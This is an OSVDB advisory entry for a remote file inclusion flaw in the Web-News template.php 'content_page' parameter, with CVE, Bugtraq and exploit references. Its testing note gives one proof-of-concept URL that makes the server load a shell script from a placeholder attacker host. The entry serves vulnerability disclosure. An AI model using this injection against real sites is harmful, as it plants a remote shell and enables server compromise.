Web-News template.php content_page Variable Remote File Inclusion

2006-09-24T09:03:57
ID OSVDB:29106
Type osvdb
Reporter OSVDB
Modified 2006-09-24T09:03:57

Description

Manual Testing Notes

http://[target]/webnews/template.php?content_page=http://[attacker]/shell.php?

References:

Vendor URL: http://sourceforge.net/projects/web-news/ Secunia Advisory ID:22075 Generic Exploit URL: http://milw0rm.com/exploits/2419 FrSIRT Advisory: ADV-2006-3763 CVE-2006-5053 Bugtraq ID: 20166